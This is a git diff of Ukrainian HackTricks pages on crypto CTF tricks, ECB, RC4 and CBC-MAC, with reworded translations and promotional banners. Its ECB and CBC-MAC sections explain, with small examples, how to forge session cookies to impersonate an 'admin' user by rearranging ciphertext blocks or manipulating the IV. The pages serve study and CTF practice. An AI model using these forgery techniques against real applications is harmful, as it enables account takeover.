-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Дізнайтеся про [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} ## Онлайн бази даних хешів @@ -55,7 +56,7 @@ * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Авторозв'язувачі кодування на основі баз +### Авторозв'язувачі кодування на базі Перевірте всі ці бази за допомогою: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) @@ -138,9 +139,11 @@ ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Мертвий: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder + +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Мертвий: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( @@ -162,7 +165,7 @@ end ### YEncoder -### Український переклад +### Український переклад: ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk @@ -188,29 +191,29 @@ ryvkryvkryvkryvkryvkryvkryvk ``` drnajapajrna ``` -* [https://www.geocachingtoolbox.com/index.php?lang=uk\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=uk\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) ### A1Z26 -Букви до їх числового значення +Літери до їх числового значення ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` ### Шифр Афіничного Шифрування -Перетворення літер у числа `(ax+b)%26` (_a_ та _b_ - ключі, _x_ - літера) та повернення результату у вигляді літери +Перетворення літер у числа `(ax+b)%26` (_a_ та _b_ - ключі, _x_ - літера), а результат знову у літеру ``` krodfdudfrod ``` -### SMS-код +### SMS Код **Multitap** [замінює літеру](https://www.dcode.fr/word-letter-change) на повторювані цифри, визначені відповідним кодом клавіатури мобільного [телефону](https://www.dcode.fr/phone-keypad-cipher) (Цей режим використовується при написанні SMS).\ Наприклад: 2=A, 22=B, 222=C, 3=D...\ -Ви можете впізнати цей код, оскільки побачите\*\* кілька повторюваних чисел\*\*. +Ви можете ідентифікувати цей код, оскільки побачите\*\* кілька повторюваних чисел\*\*. Ви можете розкодувати цей код за посиланням: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) -### Код Бейкона +### Bacon Code Замініть кожну літеру на 4 A або B (або 1 та 0) ``` @@ -233,11 +236,11 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ### Bifid -Потрібно ключове слово +Потрібен ключове слово ``` fgaargaamnlunesuneoa ``` -### Віженер +### Vigenere Потрібно ключове слово ``` @@ -247,7 +250,7 @@ wodsyoidrods * [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) * [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) -## Міцне шифрування +## Strong Crypto ### Fernet @@ -261,9 +264,9 @@ Key: ``` * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Розподіл секрету Саміра +### Сховище Саміра -Секрет розбивається на X частин, і для його відновлення потрібно Y частин (_Y <=X_). +Секрет розбивається на X частин, а для його відновлення потрібно Y частин (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 @@ -271,7 +274,7 @@ Key: ``` [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) -### Перебір паролів з використанням OpenSSL +### OpenSSL brute-force * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) @@ -282,16 +285,17 @@ Key: * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/crypto-and-stego/electronic-code-book-ecb.md b/crypto-and-stego/electronic-code-book-ecb.md index 2cf43c391..42337438e 100644 --- a/crypto-and-stego/electronic-code-book-ecb.md +++ b/crypto-and-stego/electronic-code-book-ecb.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # ECB -(ECB) Electronic Code Book - симетрична схема шифрування, яка **замінює кожний блок відкритого тексту** на **блок шифротексту**. Це **найпростіша** схема шифрування. Основна ідея полягає в тому, щоб **розділити** відкритий текст на **блоки по N біт** (залежно від розміру блоку вхідних даних, алгоритм шифрування), а потім зашифрувати (розшифрувати) кожен блок відкритого тексту, використовуючи лише ключ. +(ECB) Electronic Code Book - симетрична схема шифрування, яка **замінює кожний блок відкритого тексту** на **блок шифротексту**. Це **найпростіша** схема шифрування. Основна ідея полягає в тому, щоб **розділити** відкритий текст на **блоки по N біт** (залежно від розміру блоку вхідних даних, алгоритму шифрування) і потім зашифрувати (розшифрувати) кожен блок відкритого тексту, використовуючи лише ключ. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) @@ -27,20 +28,20 @@ # Виявлення вразливості Уявіть, що ви увійшли в додаток кілька разів і ви **завжди отримуєте одне й те ж печиво**. Це тому, що печиво додатка має формат **`<ім'я користувача>|<пароль>`**.\ -Потім ви створюєте двох нових користувачів, обоє з **однаковим довгим паролем** та **майже** **однаковим** **ім'ям користувача**.\ -Ви виявляєте, що **блоки по 8 байтів**, де **інформація обох користувачів** однакова, **рівні**. Тоді ви уявляєте, що це може бути через використання **ECB**. +Потім ви створюєте двох нових користувачів, обох з **однаковим довгим паролем** та **майже** **однаковим** **ім'ям користувача**.\ +Ви виявляєте, що **блоки по 8 байтів**, де **інформація про обох користувачів** однакова, **рівні**. Тоді ви уявляєте, що це може бути через використання **ECB**. -Подібно до наступного прикладу. Приділіть увагу тому, що ці **2 розкодовані печива** мають кілька разів блок **`\x23U\xE45K\xCB\x21\xC8`** +Подібно до наступного прикладу. Спостерігайте, як у цих **2 розшифрованих печивах** кілька разів зустрічається блок **`\x23U\xE45K\xCB\x21\xC8`** ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -Це тому, що **ім'я користувача та пароль цих файлів cookie містять кілька разів літеру "a"** (наприклад). **Блоки**, які **відрізняються**, - це блоки, які містять **принаймні 1 відмінний символ** (можливо, роздільник "|" або якась необхідна різниця в імені користувача). +Це тому, що **ім'я користувача та пароль цих куків містять кілька разів літеру "a"** (наприклад). **Блоки**, які **відрізняються**, - це блоки, які містять **принаймні 1 відмінний символ** (можливо, роздільник "|" або якась необхідна різниця в імені користувача). -Тепер зловмиснику просто потрібно виявити, чи формат `<ім'я користувача><роздільник><пароль>` чи `<пароль><роздільник><ім'я користувача>`. Для цього він може просто **створити кілька імен користувачів** з **схожими та довгими іменами користувачів та паролями, поки він не знайде формат та довжину роздільника:** +Тепер зловмиснику просто потрібно виявити, чи формат `<ім'я користувача><роздільник><пароль>` чи `<пароль><роздільник><ім'я користувача>`. Для цього він може просто **генерувати кілька імен користувачів** з **схожими та довгими іменами користувачів та паролями, поки не знайде формат та довжину роздільника:** -| Довжина імені користувача: | Довжина пароля: | Довжина Ім'я користувача + Пароль: | Довжина файлу cookie (після декодування): | +| Довжина імені користувача: | Довжина пароля: | Довжина Ім'я+Пароль: | Довжина куки (після декодування): | | ---------------- | ---------------- | ------------------------- | --------------------------------- | | 2 | 2 | 4 | 8 | | 3 | 3 | 6 | 8 | @@ -52,12 +53,12 @@ ## Видалення цілих блоків -Знаючи формат файлу cookie (`<ім'я користувача>|<пароль>`), для того щоб видаляти ім'я користувача `admin`, створіть нового користувача з ім'ям `aaaaaaaaadmin` та отримайте файл cookie та розкодуйте його: +Знаючи формат куки (`<ім'я користувача>|<пароль>`), для того щоб видаляти ім'я користувача `admin`, створіть нового користувача з ім'ям `aaaaaaaaadmin` та отримайте куку та розкодуйте її: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -Ми можемо побачити шаблон `\x23U\xE45K\xCB\x21\xC8`, створений раніше з ім'ям користувача, яке містить лише `a`.\ -Потім ви можете видалити перший блок 8B і отримаєте дійсний куки для імені користувача `admin`: +Ми можемо побачити патерн `\x23U\xE45K\xCB\x21\xC8`, створений раніше з ім'ям користувача, яке містить лише `a`.\ +Потім ви можете видалити перший блок 8B і отримаєте дійсний кукі для імені користувача `admin`: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -68,7 +69,7 @@ Таким чином, інший спосіб підробити користувача `admin` буде: * Створити ім'я користувача таке, що: `len() + len(` створить 2 блоки з 8B. -* Потім створити пароль, який заповнить точну кількість блоків, що містять ім'я користувача, яке ми хочемо підробити, та пробіли, наприклад: `admin ` +* Потім створіть пароль, який заповнить точну кількість блоків, що містять ім'я користувача, яке ми хочемо підробити, та пробіли, наприклад: `admin ` Cookie цього користувача буде складатися з 3 блоків: перші 2 блоки - блоки імені користувача + роздільник, а третій - пароль (який підробляє ім'я користувача): `username |admin ` diff --git a/crypto-and-stego/rc4-encrypt-and-decrypt.md b/crypto-and-stego/rc4-encrypt-and-decrypt.md index b1ced9162..43dd2e8bb 100644 --- a/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,22 +1,42 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} Якщо ви зможете зашифрувати текстовий рядок за допомогою RC4, ви зможете розшифрувати будь-який контент, зашифрований цим RC4 (використовуючи те саме пароль) просто використовуючи функцію шифрування. -Якщо ви зможете зашифрувати відомий текст, ви також зможете витягнути пароль. Додаткові посилання можна знайти на машині HTB Kryptos: +Якщо ви зможете зашифрувати відомий текст, ви також зможете витягти пароль. Додаткові посилання можна знайти на машині HTB Kryptos: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + + + + + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index 47c10bb24..3489833e0 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # CBC @@ -19,7 +20,7 @@ # CBC-MAC -**Код аутентифікації повідомлення з шифруванням блоків за допомогою ланцюга блоків** (**CBC-MAC**) - це метод, що використовується в криптографії. Він працює шляхом шифрування повідомлення блок за блоком, де шифрування кожного блоку пов'язане з попереднім. Цей процес створює **ланцюжок блоків**, забезпечуючи, що зміна навіть одного біта в оригінальному повідомленні призведе до непередбачуваної зміни в останньому блоку зашифрованих даних. Для внесення або скасування такої зміни потрібний ключ шифрування, що забезпечує безпеку. +**Код аутентифікації повідомлення з ланцюжком шифрування блоків** (**CBC-MAC**) - це метод, що використовується в криптографії. Він працює шляхом шифрування повідомлення блок за блоком, де шифрування кожного блоку пов'язане з попереднім. Цей процес створює **ланцюжок блоків**, забезпечуючи, що зміна навіть одного біта в оригінальному повідомленні призведе до непередбачуваної зміни останнього блоку зашифрованих даних. Для внесення або скасування такої зміни потрібний ключ шифрування, що забезпечує безпеку. Для обчислення CBC-MAC повідомлення m, його шифрують в режимі CBC з нульовим вектором ініціалізації та зберігають останній блок. Наступна фігура наводить обчислення CBC-MAC повідомлення, що складається з блоків![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) за допомогою секретного ключа k та блочного шифру E: @@ -28,7 +29,7 @@ # Вразливість З CBC-MAC зазвичай використовується **IV рівний 0**.\ -Це проблема, оскільки 2 відомі повідомлення (`m1` та `m2`) незалежно генерують 2 підписи (`s1` та `s2`). Таким чином: +Це проблема, оскільки 2 відомі повідомлення (`m1` та `m2`) незалежно генеруватимуть 2 підписи (`s1` та `s2`). Таким чином: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` @@ -38,7 +39,7 @@ * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**Це можливо обчислити без знання ключа шифрування.** +**Це можливо обчислити, не знаючи ключ шифрування.** Уявіть, що ви шифруєте ім'я **Адміністратор** у блоках **8 байтів**: @@ -47,7 +48,7 @@ Ви можете створити ім'я користувача **Administ** (m1) та отримати підпис (s1).\ Потім ви можете створити ім'я користувача, яке дорівнює результату `rator\00\00\00 XOR s1`. Це згенерує `E(m2 XOR s1 XOR 0)`, яке є s32.\ -Тепер ви можете використовувати s32 як підпис повного імені **Адміністратор**. +тепер ви можете використовувати s32 як підпис повного імені **Адміністратор**. ### Резюме @@ -58,7 +59,7 @@ # Керування атакою IV Якщо ви можете контролювати використаний IV, атака може бути дуже простою.\ -Якщо cookie - це просто зашифроване ім'я користувача, для видачі себе за користувача "**адміністратор**" ви можете створити користувача "**Адміністратор**" і отримати його cookie.\ +Якщо cookie - це просто зашифроване ім'я користувача, для видачі себе за користувача "**адміністратор**" ви можете створити користувача "**Адміністратор**" і отримаєте його cookie.\ Тепер, якщо ви можете контролювати IV, ви можете змінити перший байт IV так, що **IV\[0] XOR "A" == IV'\[0] XOR "a"** і згенерувати cookie для користувача **Адміністратор**. Цей cookie буде дійсним для **видачі себе** за користувача **адміністратор** з початковим **IV**. ## Посилання @@ -66,16 +67,17 @@ Додаткова інформація за посиланням [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index dc7f1182e..42f78414f 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,18 +1,19 @@ # Хитрощі Crypto CTFs +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Дізнайтеся про [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} ## Онлайн бази даних хешів @@ -55,7 +56,7 @@ * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Авторозв'язувачі кодування на основі баз +### Авторозв'язувачі кодування на базі Перевірте всі ці бази за допомогою: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) @@ -91,7 +92,7 @@ * `BQ%]q@psCd@rH0l` * **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] * `<~BQ%]q@psCd@rH0l~>` -* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] +* **Base85 (IPv6 або RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] * `Xm4y`V\_|Y(V{dF>\` * **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] * `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` @@ -132,13 +133,13 @@ ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Мертвий: 